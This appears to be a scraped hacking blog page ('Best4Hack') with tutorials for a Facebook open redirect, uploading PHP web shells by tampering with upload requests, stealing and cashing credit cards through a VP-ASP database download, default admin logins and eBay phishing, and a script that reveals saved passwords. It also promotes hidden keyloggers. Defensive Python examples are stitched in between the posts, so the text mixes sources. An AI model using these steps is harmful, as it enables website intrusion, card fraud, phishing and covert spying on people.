Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking, get the latest Tips and Tricks, free Hacked and Cracked Software, and SEO.

Showing posts with label Hacking Tricks. Show all posts

Saturday, 8 March 2014

Facebook Open Redirect Vulnerability

This very short tutorial will explain my way of creating Facebook open redirect links. As some of you may know, Facebook open redirects are rare and hard to make due to the Link Shim (l.php).
This method, however, is easy, and Facebook themselves don't think this is a vulnerability: "This is not a vulnerability in our opinion." Note the "in our opinion" - to me this is a vulnerability.
This open redirect will work as long as you are friends with the person you are sending the link to.

Step 1 :-

First, visit this link: http://facebook.com/help/cookies

The page will look like :-



Step 2 :-

Then view the page source and search for h=

Step 3 :-

Copy the security code after the h= and before the &s=. It will look like h=XXXXXXXXX. You have to copy only XXXXXXXXX.

Step 4 :-

Now simply create the URL like http://facebook.com/l.php?u=http://best4hack.com/&h=XXXXXXXXX

Step 5 :-

Give this link to your victim he or she will get the redirect to be open (without "leaving facebook" warning)

As said earlier you can only get the redirect to be open (without "leaving facebook" warning) if you're sending this link to a friend.
It is possible to create the link before adding the victim as a friend. But there does have to be that "relationship" between accounts.
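From the defender's side, the behaviour described in this post comes down to a redirect token that is accepted for a destination it was never issued for. The following is an added example, not code from the post and not Facebook's implementation: a link shim whose `h` value is an HMAC over the viewer and the exact destination; `SHIM_KEY`, `link_tag`, `sign_link` and `resolve_link` are hypothetical names.

```python
import hashlib
import hmac
from urllib.parse import parse_qs, urlencode, urlsplit

# Assumption: a server-side secret; a real deployment loads it from a key store.
SHIM_KEY = b"constructed-demo-key-not-a-real-secret"


def link_tag(dest_url: str, viewer_id: str) -> str:
    """HMAC over the viewer AND the exact destination, so a tag lifted from
    one page cannot be reused with a different u= value or by another user."""
    msg = viewer_id.encode() + b"\x00" + dest_url.encode()
    return hmac.new(SHIM_KEY, msg, hashlib.sha256).hexdigest()[:32]


def sign_link(dest_url: str, viewer_id: str) -> str:
    """Build the shim URL the site embeds in pages it renders for viewer_id."""
    return "/l.php?" + urlencode({"u": dest_url, "h": link_tag(dest_url, viewer_id)})


def resolve_link(shim_url: str, viewer_id: str) -> tuple[str, str]:
    """Decide what the shim endpoint does with an incoming request.

    ("redirect", url): tag matches this viewer and this destination.
    ("warn", url):     tag missing or wrong, show the leaving-site interstitial.
    ("reject", url):   destination is not an http(s) URL at all.
    """
    params = parse_qs(urlsplit(shim_url).query)
    dest = params.get("u", [""])[0]
    tag = params.get("h", [""])[0]
    if urlsplit(dest).scheme not in ("http", "https"):
        return ("reject", dest)
    # compare_digest avoids leaking the expected tag through timing.
    if tag and hmac.compare_digest(tag, link_tag(dest, viewer_id)):
        return ("redirect", dest)
    return ("warn", dest)


if __name__ == "__main__":
    # Constructed sample values.
    issued = sign_link("https://example.org/help", "alice")
    print(resolve_link(issued, "alice"))
    lifted = parse_qs(urlsplit(issued).query)["h"][0]
    swapped = "/l.php?" + urlencode({"u": "https://other.example/", "h": lifted})
    print(resolve_link(swapped, "alice"))
```

A tag copied out of one link and pasted next to a different `u=` value falls through to the interstitial instead of redirecting silently.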

Saturday, 22 February 2014

HOW TO USE PHONE AS CCTV CAMERA

Sunday, 26 May 2013

What Is Keylogging Software






If you've been looking into keylogging software, you may want to know exactly what it is and what it can be used for. The term keylogger is now regarded as outdated, as it only refers to one function the software can perform: logging anything typed. But as tech has improved so has the need to monitor and log all sides of computing; and so keyloggers have taken the more ubiquitous name of 'Computer Monitoring Software'.

Computer Monitoring Software can be used in a variety of situations, from monitoring which websites are being visited to finding out someone's password. Parents use monitoring software to keep an eye on their kids, and employers use it to keep checks on those employees who they suspect of slacking off too much. Monitoring software can also be used as a highly effective instantaneous backup tool, because everything that is done on the computer is instantly logged, whereas most backup tools will only do this at set intervals. Whatever your reason for needing keylogging software, you'll be sure to find something that suits your needs.

So what exactly can monitoring software monitor? These days pretty much anything. They will monitor every website visited, every application used, every document or file opened (or moved, deleted, saved etc), everything printed and everything typed (including the website or application it was typed into). All of this will be logged in an easy to read way, and marked with the times and dates of each activity. Some keyloggers will also include extra features like microphone recording or webcam monitoring. But these features will usually cost more.

The other big function of computer monitoring software is that it works in absolute stealth. Once it is downloaded and installed, it will run quietly every time the computer is started up, and will log everything whilst being hidden in the background. Users of the computer will not know they are being monitored, even if they look for a program in the start menu, task manager, program files directory, or anywhere else you'd look for installed software. Keyloggers can stay completely hidden. You will also be able to set the software to send you the logs secretly via email, so that you don't have to risk logging back into the computer (using a key combination and password to access the software) and getting caught out.

As you can see, keylogging software is pretty powerful these days and can be used for a wide range of reasons. If you'd like to see some reviews of top keylogger software head to the keylogger downloads and reviews site here, where Gecko Monitor is currently number one.

Tuesday, 30 April 2013

How Create Virtual Online Drive For Free With The Help Of Gmail



You all may know well about virtual drives. But what about creating an online virtual drive on your own computer and making it available to you anytime, anywhere? Surprised? Yes, it's true. Gmail provides about 7650 MB to 10240 MB for each account, which means you can create a virtual online disk of about 7.5 GB to 10 GB on your own computer. All this is possible with the help of a tool called GMail Drive. GMail Drive creates a virtual filesystem around your Google Mail account, allowing you to use Gmail as a storage medium.

GMail Drive creates a virtual filesystem on top of your Google Gmail account and enables you to save and retrieve files stored on your Gmail account directly from inside Windows Explorer. GMail Drive literally adds a new drive to your computer under the My Computer folder, where you can create new folders, copy and drag'n'drop files to it. Ever since Google started to offer users a Gmail e-mail account, which includes storage space of 7650 megabytes to 10240 megabytes, you have had plenty of storage space but not a lot to fill it up with. With GMail Drive you can easily copy files to your Google Mail account and retrieve them again.

When you create a new file using GMail Drive, it generates an e-mail and posts it to your account. The e-mail appears in your normal Inbox folder, and the file is attached as an e-mail attachment. GMail Drive periodically checks your mail account (using the Gmail search function) to see if new files have arrived and to rebuild the directory structures. But basically GMail Drive acts as any other hard-drive installed on your computer.

HOW TO MAKE A VIRTUAL ONLINE DRIVE:-

GMail Drive creates a virtual filesystem on top of your Google Gmail account and enables you to save and retrieve files stored on your Gmail account directly from inside Windows Explorer.

First, download GmailDrive.

STEPS To Follow:-

1. Extract all the files from the downloaded archive and run setup. After installation, go to My Computer, where you will see a new drive.



GMail Drive literally adds a new drive to your computer under the My Computer folder, where you can create new folders, copy and drag'n'drop files to it.

2. Double click on the drive. When you do, a login window pops up.



Enter your Gmail ID and password. It's better not to use your personal email; create a new one for this virtual online drive, and that's it. All the data in this drive is secure and can be accessed only by you, from anywhere and at any time.

HOW TO REMOVE THIS VIRTUAL DRIVE:-

If you want to remove this virtual drive from your system, just go to Control Panel => Programs and Features => Uninstall or change a program and uninstall GmailDrive from there. It will be automatically removed from My Computer.

Thursday, 25 April 2013

How To Rename "Refresh" Option In Windows XP




Hey guys, welcome to Best4Hack. Today I am going to tell you how to rename the "Refresh" option in Windows XP. You just have to follow some simple steps and your work will be done.

What is Resource Hacker :-

1. View resources in Win32 executable files (*.exe, *.dll, *.cpl, *.ocx) and in Win32 resource files (*.res) in both their compiled and decompiled formats.
2. Extract (save) resources to file in: *.res format; as a binary; or as decompiled resource scripts or images. Icons, bitmaps, cursors, menus, dialogs, string tables, message tables, accelerators, Borland forms and version info resources can be fully decompiled into their respective formats, whether as image files or *.rc text files.
3. Modify (rename or replace) resources in executable. Image resources (icons, cursors and bitmaps) can be replaced with an image from a corresponding image file (*.ico, *.cur, *.bmp), a *.res file or even another *.exe file. Dialogs, menus, stringtables, accelerators and messagetable resource scripts (and also Borland forms) can be edited and recompiled using the internal resource script editor. Resources can also be replaced with resources from a *.res file as long as the replacement resource is of the same type and has the same name.
4. Add new resources to executable. Enable a program to support multiple languages, or add a custom icon or bitmap (company logo etc) to a program's dialog.
5. Delete resources.
Most compilers add resources into applications which are never used by the application. Removing these unused resources can reduce an application's size.

Hope you all got enough information about Resource Hacker. Now we can continue with our trick.

Step 1 :- Download the Resource Hacker and Replacer tools for free.
Step 2 :- Open Resource Hacker and click Open.
Step 3 :- Choose Shell32.dll > Menu > 215 > 1033
Step 4 :- Change the word 'Refresh' to any name that you want.
Step 5 :- After changing the appropriate options, compile the script with the Compile Script option.
Step 6 :- Save the file at another location with Save As. Please ensure that it is not the original location of Shell32.dll.
Step 7 :- Now open the Replacer tool.
Step 8 :- Drag & drop the Shell32.dll file from system32 onto Replacer, then press the Enter key.
Step 9 :- Now drag & drop the newly saved file onto Replacer, then press Enter.
Step 10 :- Press y and reboot the system.

That's it, you are done. After rebooting your system, when you right click on your desktop you can see that the Refresh option name has been changed.

Friday, 8 March 2013

How to upload PHP shell through Firefox Add-on

Many times you get the login of a website, but you are unable to upload your PHP shell!
Today I'll show you how to upload your PHP shell through Tamper Data, a Firefox add-on.

Install Tamper Data firefox add-on:
Download Tamper Data CLICK HERE
Now Install it and Restart Firefox

Rename shell:
Note: You have to rename your .php shell to .jpg to bypass the website's security.
To upload a shell, of course you need an upload option in the login page or anywhere!

Demo:
As an example i'll take - http://freead1.net/post-free-ad-to-USA-42

It is a free classified ads posting website, so I got an upload option there!
Find your upload option, click on Browse, locate your .jpg shell and select it!



Now click on Tools in Firefox Menu bar and Select Tamper Data, Tamper Data plugin will open in a new window !


Before Clicking on Upload button click on "Start Tamper" in Tamper Data window..
Note: Before Clicking on "Start Tamper" close every extra tab you have opened.. If you want this tutorial to be open... Just open it in another browser

Now click on upload button !

After clicking on upload button "Tamper with request?" window will appear !
Click on "Tamper" button


After a click on "Tamper" you will see "Tamper Popup"
In Tamper Popup Window, Copy "POST_DATA" text in Notepad


After Copying it to Notepad... "Find yourshell.jpg" and rename it to .php.

Now copy Notepad's text back to "POST_DATA" field..and click OK
It will Upload the shell as .php and you can execute it easily !
Find your .php shell & do whatever you wanted with that website
that's all !

Saturday, 16 February 2013

How to upload Shell by Live HTTP Headers

Today I will tell you how to upload shell through Live HTTP Headers.

Requirements:-

  • Mozilla Firefox
  • Live HTTP Headers Add On for Firefox
  • A shell

So now let's begin,

  1. Login to that site as a admin, then find a place to upload a file in that particular site.
  2. Then rename your shell name to shell.php.jpg (or what ever that site supports. In my case, site supports only jpg file. Thats why i renamed it to shell.php.jpg.)
  3. Then start your Live HTTP Headers addon, after that upload your shell.
  4. Then your Live HTTP Headers will look something similar to this

  5. Then click on the shell.php.jpg, after click on Reply button.
  6. Then again a new window will open, in that window there will be two boxes, but we have to work on second box :D.
  7. In the second box, rename your shell.php.jpg to shell.php, then again click on Reply button.

Now you have successfully done it; the only thing you have to do is find the shell path.

This is only for educational purposes. I'll not be responsible for any illegal work done by you.
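Both upload posts above depend on the server trusting the filename that arrives in the request, which the client can change after any browser-side check has run. The following is an added example, not code from either post, of a server-side upload handler that ignores the client-supplied name; `store_upload`, `sniff_extension`, the accepted types and the size limit are assumptions, and the sample bytes are constructed.

```python
import os
import secrets
import tempfile

# Magic-byte signatures for the only types this (hypothetical) form accepts.
SIGNATURES = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}
ALIASES = {".jpeg": ".jpg"}
MAX_BYTES = 2 * 1024 * 1024  # assumed limit for this form


class UploadRejected(Exception):
    """Raised when the uploaded content is not an accepted image."""


def sniff_extension(data: bytes):
    """Return the extension implied by the leading bytes, or None."""
    for magic, ext in SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def store_upload(client_filename: str, data: bytes, upload_dir: str) -> dict:
    """Validate by content and store under a name the server chooses.

    upload_dir should sit outside the web root, or in a location the web
    server is configured never to execute scripts from.
    """
    if len(data) > MAX_BYTES:
        raise UploadRejected("upload too large")
    ext = sniff_extension(data)
    if ext is None:
        raise UploadRejected("content is not an allowed image type")

    # The request's filename is attacker-controlled: it is never used for the
    # stored name, only compared against the content as a detection signal.
    client_ext = os.path.splitext(client_filename)[1].lower()
    client_ext = ALIASES.get(client_ext, client_ext)

    stored_name = secrets.token_hex(16) + ext  # extension comes from content
    path = os.path.join(upload_dir, stored_name)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return {"stored_as": stored_name, "path": path,
            "name_mismatch": client_ext != ext}


if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16   # constructed JPEG-like bytes
    script = b"<?php /* constructed placeholder */ ?>"
    with tempfile.TemporaryDirectory() as d:
        print(store_upload("holiday.php", jpeg, d))   # stored as .jpg, flagged
        try:
            store_upload("shell.php", script, d)
        except UploadRejected as exc:
            print("rejected:", exc)
```

Content sniffing alone does not stop an image that also carries script text, so the server-chosen extension and a non-executable storage location are what keep the file from running; `name_mismatch` is worth logging and alerting on.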

Thursday, 13 December 2012

See The Passwords Behind Asterisk !







Hello all users,


Prince here...I am going to show you in a short tutorial how to read out a password of a web browser.


Example:


http://www.gmail.com


Username: example@gmail.com
Password: *****


What's my password?


Alright, now you could read out the *** stuff with a simple javascript code.

(mediafire link)

All you need is to copy & paste it in the URL-address bar.

Enjoy.......


Saturday, 24 November 2012

HOW TO HACK A CREDIT CARD !!!!!!!




HELLO WORLD IM DAVIDREX IS HERE FOR A NICE AND USEFUL TRICKS:
LETS START.......


THIS TUTORIAL IS DIVIDED IN TWO PARTS.
INTRODUCTION INTO CREDIT CARDS
CREDIT CARD HACKING

NOTE: HACKING CREDIT CARDS IS AN ILLEGAL ACT, THIS IS ONLY INFORMATIONAL POST AND WE NOT RESPONSIBLE FOR ANY ACTIONS DONE BY YOU AFTER READING THIS TUTORIAL. THIS POST IS FOR EDUCATIONAL PURPOSES ONLY.

LETS START WITH SOME EASY TERMS.

WHAT IS CREDIT CARD ?

CREDIT CARDS ARE OF TWO TYPES:
DEBIT CARD
CREDIT CARD
1. DEBIT MEANS U HAVE A SUM OF AMOUNT IN IT AND U CAN USE THEM.
2. CREDIT MEANS U HAVE A CREDIT LINE LIMIT LIKE OF $10000 AND U CAN USE THEM AND BY THE END OF MONTH PAY IT TO BANK.

TO USE A CREDIT CARD ON INTERNET U JUST NOT NEED CC NUMBER AND EXPIRY BUT U NEED MANY INFO LIKE :
FIRST NAME
LAST NAME
ADDRESS
CITY
STATE
ZIP
COUNTRY
PHONE
CC NUMBER
EXPIRY
CVV2 ( THIS IS 3DIGIT SECURITY CODE ON BACKSIDE AFTER SIGNATURE PANEL )
IF YOU GET THAT INFO YOU CAN USE THAT TO BUY ANY THING ON INTERNET, LIKE SOFTWARE LICENSE, PORN SITE MEMBERSHIP, PROXY MEMBERSHIP, OR ANY THING (ONLINE SERVICES USUALLY, LIKE WEBHOSTING, DOMAINS).

IF U WANT TO MAKE MONEY $ THROUGH HACKING THEN YOU NEED TO BE VERY LUCKY... YOU NEED TO HAVE A EXACT BANK AND BIN TO CASH THAT CREDIT CARD THROUGH ATM MACHINES.

LET ME EXPLAIN HOW ?

FIRST STUDY SOME SIMPLE TERMS.

BINS = FIRST 6 DIGIT OF EVERY CREDIT CARD IS CALLED " BIN " (FOR EXAMPLE CC NUMBER IS : 4121638430101157 THEN ITS BIN IS " 412163 "), I HOPE THIS IS EASY TO UNDERSTAND.

NOW THE QUESTION IS HOW TO MAKE MONEY THROUGH CREDIT CARDS. ITS STRANGE..., WELL YOU CANT DO THAT, BUT THERE IS SPECIFIC PERSONS IN WORLD WHO CAN DO THAT. THEY CALL THEM SELVES " CASHIERS ". YOU CAN TAKE SOME TIME TO FIND A RELIABLE CASHIERS.

NOW THE QUESTION IS EVERY BANK CREDIT CARDS ARE CASHABLE AND EVERY BIN IS CASHABLE? LIKE CITIBANK, BANK OF AMERICA , MBNA .. ARE ALL BANKS ARE CASHABLES ? WELL ANSWER IS " NO ". IF U KNOW SOME THING, A LITTLE THING ABOUT BANKING SYSTEM, HAVE U EVER HEARD WHAT IS ATM MACHINES? WHERE U WITHDRAW UR CASH BY PUTTING UR CARD IN.
EVERY BANK DON'T HAVE ATM, EVERY BANK DON'T SUPPORT ATM MACHINES CASHOUT. ONLY FEW BANKS SUPPORT WITH THEIR FEW BINS (AS U KNOW BIN IS FIRST 6 DIGIT OF ANY CREDIT / DEBIT CARD NUMBER), FOR SUPPOSE BANK OF AMERICA. THAT BANK NOT HAVE ONLY 1 BIN, THAT BANK IS ASSIGNED LIKE, 412345 412370 ARE UR BINS U CAN MAKE CREDIT CARDS ON THEM. SO BANK DIVIDE THE COUNTRY CITI LOCATION WISE, LIKE FROM 412345 - 412360 IS FOR AMERICANS, AFTER THAT FOR OUTSIDERS AND LIKE THIS. I HOPE U UNDERSTAND. SO ALL BINS OF THE SAME BANK ARE EVEN NOT CASHABLE, LIKE FOR SUPPOSE THEY SUPPORT ATM IN NEW YORK AND NOT IN CALIFORNIA, SO LIKE THE BINS OF CALIFORNIA OF SAME BANK WILL BE UNCASHABLE. SO ALWAYS MAKE SURE THAT THE BINS AND BANKS ARE 100% CASHABLE IN MARKET BY MANY CASHIERS.

BE SURE CASHIERS ARE LEGIT, BECAUSE MANY CASHIERS R THERE WHICH TAKE YOUR CREDIT CARD AND RIP U OFF AND DON'T SEND YOUR 50% SHARE BACK.
YOU CAN ALSO FIND SOME CASHIERS ON MIRC *( /SERVER IRC.UNIXIRC.NET:6667 ) CHANNEL : #CASHOUT, #CCPOWER

WELL, CHECK THE WEBSITE WHERE U HAVE LIST OF BINS AND BANKS MOSTLY 101% CASHABLE. IF U GET THE CREDIT CARD OF THE SAME BANK WITH SAME BIN, THEN U CAN CASHOUT OTHERWISE NOT . REMEMBER FOR USING CREDIT CARD ON INTERNET U DON'T NEED PIN ( 4 WORDS PASSWORD WHICH U ENTER IN ATM MACHINE ), BUT FOR CASHOUT U NEED. YOU CAN GET PINS ONLY BY 2ND METHOD OF HACKING WHICH I STILL NOT POST BUT I WILL. FIRST METHOD OF SQL INJECTION AND SHOPADMIN HACKING DON'T PROVIDE WITH PINS, IT ONLY GIVE CC NUMB CVV2 AND OTHER INFO WHICH USUALLY NEED FOR SHOPPING NOT FOR CASHING.

CREDIT CARD HACKING

CC (CREDIT CARDS) CAN BE HACKED BY TWO WAYS:
CREDIT CARD SCAMS ( USUALLY USED FOR EARNING MONEY , SOME TIMES FOR SHOPPING )
CREDIT CARD SHOPADMIN HACKING ( JUST FOR FUN, KNOWLEDGE, SHOPPING ON INTERNET )
1. SHOPADMIN HACKING

THIS METHOD IS USED FOR TESTING THE KNOWLEDGE OR FOR GETTING THE CREDIT CARD FOR SHOPPING ON INTERNET, OR FOR FUN, OR ANY WAY BUT NOT FOR CASHING ( BECAUSE THIS METHOD DON'T GIVE PIN - 4 DIGIT PASSCODE ) ONLY GIVES CC NUMB , CVV2 AND OTHER BASIC INFO.

SHOPADMINS ARE OF DIFFERENT COMPANIES, LIKE: VP-ASP , X CART, ETC. THIS TUTORIAL IS FOR HACKING VP-ASP SHOP.

I HOPE U SEEN WHENEVER U TRY TO BUY SOME THING ON INTERNET WITH CC, THEY SHOW U A WELL PROGRAMMED FORM, VERY SECURE. THEY ARE CARTS, LIKE VP-ASP XCARTS. SPECIFIC SITES ARE NOT HACKED, BUT CARTS ARE HACKED.

BELOW I'M POSTING TUTORIAL TO HACK VP ASP CART. NOW EVERY SITE WHICH USE THAT CART CAN BE HACKED, AND THROUGH THEIR *MDB FILE U CAN GET THEIR CLIENTS 'CREDIT CARD DETAILS', AND ALSO LOGIN NAME AND PASSWORD OF THEIR ADMIN AREA, AND ALL OTHER INFO OF CLIENTS AND COMAPNY SECRETS.

LETS START:

TYPE: VP-ASP SHOPPING CART
VERSION: 5.00

HOW TO FIND VP-ASP 5.00 SITES?

FINDING VP-ASP 5.00 SITES IS SO SIMPLE...

1. GO TO GOOGLE.COM AND TYPE: VP-ASP SHOPPING CART 5.00
2. YOU WILL FIND MANY WEBSITES WITH VP-ASP 5.00 CART SOFTWARE INSTALLED

NOW LET'S GO TO THE EXPLOIT..

THE PAGE WILL BE LIKE THIS: ****://***.VICTIM.COM/SHOP/SHOPDISPLAYCATEGORIES.ASP
THE EXPLOIT IS: DIAG_DBTEST.ASP
NOW YOU NEED TO DO THIS: ****://***.VICTIM.COM/SHOP/DIAG_DBTEST.ASP

A PAGE WILL APPEAR CONTAIN THOSE:
XDATABASE
SHOPPING140
XDBLOCATION
RESX
XDATABASETYPEXEMAILXEMAIL NAMEXEMAILSUBJECTXEMAILSY STEMXEMAILTYPEXORDERNUMBE R
EXAMPLE:

THE MOST IMPORTANT THING HERE IS XDATABASE
XDATABASE: SHOPPING140

OK, NOW THE URL WILL BE LIKE THIS: ****://***.VICTIM.COM/SHOP/SHOPPING140.MDB

IF YOU DIDN'T DOWNLOAD THE DATABASE, TRY THIS WHILE THERE IS DBLOCATION:
XDBLOCATION
RESX
THE URL WILL BE: ****://***.VICTIM.COM/SHOP/RESX/SHOPPING140.MDB

IF U SEE THE ERROR MESSAGE YOU HAVE TO TRY THIS :
****://***.VICTIM.COM/SHOP/SHOPPING500.MDB

DOWNLOAD THE MDB FILE AND YOU SHOULD BE ABLE TO OPEN IT WITH ANY MDB FILE VIEWER, YOU SHOULD BE ABLE TO FIND ONE AT DOWNLOAD.COM, OR USE MS OFFICE ACCESS.
INSIDE YOU SHOULD BE ABLE TO FIND CREDIT CARD INFORMATION, AND YOU SHOULD EVEN BE ABLE TO FIND THE ADMIN USERNAME AND PASSWORD FOR THE WEBSITE.

THE ADMIN LOGIN PAGE IS USUALLY LOCATED HERE: ****://***.VICTIM.COM/SHOP/SHOPADMIN.ASP

IF YOU CANNOT FIND THE ADMIN USERNAME AND PASSWORD IN THE MDB FILE OR YOU CAN BUT IT IS INCORRECT, OR YOU CANNOT FIND THE MDB FILE AT ALL, THEN TRY TO FIND THE ADMIN LOGIN PAGE AND ENTER THE DEFAULT PASSWORDS WHICH ARE:
USERNAME: ADMIN
PASSWORD: ADMIN
OR
USERNAME: VPASP
PASSWORD: VPASP


2. HACKING THROUGH SCAMS

THIS METHOD IS USUALLY USED TO HACK FOR EARNING MONEY. WHAT HAPPENS IN THIS METHOD IS YOU CREATE A CLONE PAGE.

TARGET: ITS BASICALLY EBAY.COM OR PAYPAL.COM FOR GENERAL CREDIT CARDS, OR IF U WANT TO TARGET ANY SPECIFIC CASHABLE BANK LIKE REGIONBANK.COM THEN U HAVE TO CREATE A CLONE PAGE FOR THAT BANK.

WHAT IS EBAY.COM?

ITS A SHOPPING SITE WORLD WIDE WHICH IS USED BY MANY OF BILLION PEOPLE WHICH USE THEIR CREDIT CARDS ON EBAY. WHAT YOU DO MAKE A SIMILAR PAGE SAME AS EBAY AND UPLOAD IT ON SOME HOSTING WHICH DON'T HAVE ANY LAW RESTRICTIONS, TRY TO FIND HOSTING IN EUROPE THEY WILL MAKE YOUR SCAM UP FOR LONG TIME, AND EMAIL THE USERS OF EBAY.

HOW TO GET THE EMAILS OF THEIR USERS?

GO TO GOOGLE.COM AND TYPE "EMAIL HARVESTOR" OR ANY EMAIL SPIDER AND SEARCH FOR EBAY BUYERS AND EBAY SELLERS AND U WILL GET LONG LIST. THAT LIST IS NOT ACCURATE BUT OUT OF 1000 ATLEAST 1 EMAIL WOULD BE VALID. ATLEAST YOU WILL GET SOME TIME.

WELL U CREATE A CLONE PAGE OF EBAY, AND MAIL THE LIST U CREATE FROM SPIDER WITH MESSAGE, LIKE "YOUR ACCOUNT HAS BEEN HACKED" OR ANY REASON THAT LOOKS PROFESSIONAL, AND ASK THEM TO VISIT THE LINK BELOW AND ENTER YOUR INFO BILLING, AND THE SCAM PAGE HAVE PROGRAMMING WHEN THEY ENTER THEIR INFO IT COMES DIRECTLY TO YOUR EMAIL.
IN THE FORM PAGE U HAVE PIN REQUIRED SO U ALSO GET THE PIN NUMBER THROUGH WHICH U CAN CASH THROUGH ATM ..

NOW IF U RUN EBAY SCAM OR PAYPAL SCAM, ITS UP TO YOUR LUCK WHO'S YOUR VICTIM. A CLIENT OF BANK OF AMERICA OR OF CITIBANK OR OF REGION, ITS ABOUT LUCK, MAYBE U GET CASHABLE, MAY BE U DON'T ITS JUST LUCK, NOTHING ELSE.

SEARCH ON GOOGLE TO DOWNLOAD A SCAM SITE AND STUDY IT !

AFTER YOU CREATE YOUR SCAM SITE, JUST FIND SOME EMAIL HARVESTOR OR SPIDER FROM INTERNET (DOWNLOAD GOOD ONE AT BULK EMAIL SOFTWARE SUPERSTORE - EMAIL MARKETING INTERNET ADVERTISING) AND CREATE A GOOD EMAIL LIST.

AND YOU NEED TO FIND A MAILER (MASS SENDING MAILER) WHICH SEND MASS - EMAILS TO ALL EMAILS WITH THE MESSAGE OF UPDATING THEIR ACCOUNT ON UR SCAM PAGE ). IN FROM TO, USE EMAIL EBAY@REPLY3.EBAY.COM AND IN SUBJECT USE : EBAY - UPDATE YOUR EBAY ACCOUNT AND IN NAME USE EBAY

SOME INSTRUCTIONS:

1. MAKE SURE YOUR HOSTING REMAINS UP OR THE LINK IN THE EMAIL U WILL SEND, AND WHEN YOUR VICTIM EMAILS VISIT IT, IT WILL SHOW PAGE CANNOT BE DISPLAYED, AND YOUR PLAN WILL BE FAILED.
2. HARDEST POINT IS TO FIND HOSTING WHICH REMAINS UP IN SCAM. EVEN I DON'T FIND IT EASILY, ITS VERY VERY HARD PART.
3. MAYBE U HAVE CONTACTS WITH SOMEONE WHO OWN HOSTING COMPANY AND CO LOCATIONS OR DEDICATED HE CAN HIDE YOUR SCAM IN SOME OF DEDICATED WITHOUT RESTRICTIONS.
4. FINDING A GOOD EMAIL LIST (GOOD MEANS = ACTUALLY USERS)
5. YOUR MASS MAILING SOFTWARE LAND THE EMAILS IN INBOX OF USERS.

Friday, 23 November 2012

CROSS SITE SCRIPTING



Cross site scripting attacks are now mostly referred to as XSS attacks. A lot of websites have been found with XSS vulnerabilities, including Yahoo, YouTube and even some other popular websites. XSS attacks are implemented when a website has XSS vulnerabilities.
It took me months to decipher what this attack is really about. Even when I was reading books on it, I felt I was seeing Latin. Anyway, now I've understood a whole lot about XSS attacks and how they work. It is very simple and interesting, and I believe you won't easily find what I give you here anywhere else.

What is XSS attack?

This attack is also known as code injection, and from that we can infer that an XSS attack is the exploitation of web servers by inserting code into the web pages. It was formerly called CSS as an acronym for cross site scripting, but I think because of the existence of CSS as cascading style sheets, it was changed to XSS, where the "X" represents a cross. Most times, people use the search pane to do this. In an XSS vulnerable website, when a code like <script>alert('you are vulnerable to XSS');</script> is inserted, a dialog box appears showing "you are vulnerable to XSS". If this can be done, then you can implement all other XSS exploitations on that website.
A few years back, the prestigious Yahoo website was vulnerable to this attack. Then we hackers would simply inject the JavaScript below into the address bar:
javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;
%20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j)
%20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i)
%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)
%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if
%20(s)%20alert(%22Passwords%20in%20forms%20on%20this
%20page:\n\n%22%20+%20s);%20else%20alert(%22There%20are
%20no%20passwords%20in%20forms%20on%20this
%20page.%22);})();
This was used to find the password behind the asterisks of anyone who had used his/her email account on that browser on that computer.
A scenario of how it works: Jeffrey uses his PC to check his Yahoo account and then logs out. Simply because Jeffrey had checked the "remember me" check button on the Yahoo password authentication page, it shows his email and his password in asterisks or big black dots. Once the JavaScript above is inserted in the address bar, Jeffrey's password will display to me in a dialog box. This was used for a long time before Yahoo fixed this error. However, you may still find a tutorial on how to hack Yahoo accounts with this strategy, but here I am telling you that it is stale and it can't work anymore.
I don't know much about how it happened with YouTube, but I know I've heard several times about XSS vulnerabilities found in YouTube.
There is a lot more you can do with XSS which I will explain in later posts, so I will just list some other ways you can implement a cross site scripting attack.
  • It can be used to make cookie grabbers - with cross site scripting, you can pretend to be a website and steal cookies from some internet users.
  • It can be used to deface web pages
  • It can be used for phishing
To find XSS vulnerability in a website, you can use vulnerability scanners like acunetix, jsky, and there are so many others. You can even write your own program to find these vulnerabilities.
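The search-box case described in this post, shown from the defender's side as an added example that is not part of the original post: the same search term rendered without encoding and with encoding chosen for each output context (HTML text, attribute value, inline script string). The function names and page layout are hypothetical, and the probe string is the one quoted in the post.

```python
import html
import json


def render_search_vulnerable(term: str) -> str:
    """Reflects the search term into the page as-is: markup in the term
    becomes markup in the response."""
    return "<p>Results for " + term + "</p>"


def js_string_literal(value: str) -> str:
    """Encode a value for use inside an inline <script> block.

    json.dumps handles quotes, backslashes and non-ASCII; the extra
    replacements stop "</script>" or "<!--" from ending the script element.
    """
    out = json.dumps(value)
    return (out.replace("<", "\\u003c")
               .replace(">", "\\u003e")
               .replace("&", "\\u0026"))


def render_search_safe(term: str) -> str:
    """Each sink gets the encoding its context needs."""
    as_text = html.escape(term, quote=True)   # HTML body text
    as_attr = html.escape(term, quote=True)   # double-quoted attribute value
    as_js = js_string_literal(term)           # JavaScript string literal
    return (
        f'<form><input name="q" value="{as_attr}"></form>\n'
        f"<p>Results for {as_text}</p>\n"
        f"<script>var lastQuery = {as_js};</script>"
    )


def reflects_markup(page: str, probe: str) -> bool:
    """Regression check: True if the probe comes back unencoded."""
    return probe in page


if __name__ == "__main__":
    probe = "<script>alert('you are vulnerable to XSS');</script>"
    print(reflects_markup(render_search_vulnerable(probe), probe))  # True
    print(reflects_markup(render_search_safe(probe), probe))        # False
    print(render_search_safe(probe))
```

`reflects_markup` can be kept as a unit test over every template that echoes user input, so a regression shows up before a scanner or an attacker finds it.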


ETHICAL HACKING TRAINING WITH PHP/SQL TRAINING


Hello viewers, we bring you a very great opportunity right at your doorsteps.
For those of you interested in ethical hacking and information security, we have it at Innobuzz with detailed tutorials and customer friendly help.
For development of Android applications, we are there to help you
Our trainings include PHP/SQL training, online marketing, technical analysis, and advanced Metasploit tutorials.
